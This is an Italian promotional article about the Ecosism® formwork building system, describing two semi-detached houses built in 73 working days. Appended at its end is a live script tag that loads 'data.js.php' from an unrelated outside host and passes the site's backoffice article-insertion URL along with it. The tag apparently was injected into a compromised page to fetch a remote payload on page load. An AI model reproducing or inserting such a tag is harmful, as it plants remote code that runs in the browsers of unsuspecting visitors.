ll sistema costruttivo Ecosism® esalta il valore del tempo e permette a chi vuol costruire di gestirlo al meglio: la produzione su misura abbatte i tempi di posa e si traduce in minori costi, minori sprechi e maggiore garanzia di risultato. La qualità di Ecosism® è frutto di una tecnologia costruttiva realizzata su progetto in funzione delle esigenze progettuali e di cantiere.
Le foto illustrano una delle ultime realizzazioni costruite con la tecnologia ECOSISM® in Emilia Romagna. Trattasi di 2 villette abbinate costruite con i Moduli a getto singolo 10+5NES37 (1 cm + 10 cm di EPS + 20 cm di getto + 5 cm di EPS + 1 cm) e rivestite con una muratura faccia a vista con fuga realizzata utilizzando i mattoni vecchi preesistenti montati a filo della rete di acciaio zincato con opportuni ancoraggi.
Per eseguire la preparazione e la posa della platea, dei moduli ECOSISM®, del muro esterno faccia a vista e la posa del tetto con i coppi sono stati necessari solamente 32 GIORNI LAVORATIVI. In seguito per la posa degli impianti, degli intonaci, dei massetti con i pavimenti, delle scale ed infine per le tinteggiature e le varie finiture sono stati necessari altri 41 giorni lavorativi per un totale di 73 giorni con 5 persone al lavoro.
Ecosism srl fornisce casseri creati "su misura" come richiesti dal cliente e permette a chi si occuperà della costruzione di poter risparmiare tempo, manodopera e sprechi inutili rispetto ai sistemi costruttivi tradizionali valorizzando il proprio investimento finanziario, di mezzi e tempo.
Il sistema costruttivo ECOSISM® permette di realizzare edifici in cemento armato, antisismici, acusticamente performanti e dotati di un elevato isolamento termico ad un costo di costruzione altamente competitivo rispetto a soluzioni di edilizia tradizionale a parità di prestazioni. La tecnologia costruttiva ECOSISM® si compone di una gamma completa di casseri ognuno studiato per rispondere al meglio all’ampia varietà di esigenze del costruire moderno. Il sistema ECOSISM® è prodotto su misura, secondo il progetto esecutivo da realizzare e viene assemblato in cantiere seguendo un preciso schema di montaggio.
Per ulteriori informazioni: www.ecosism.com.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.46664150507785473" type="text/javascript"></script>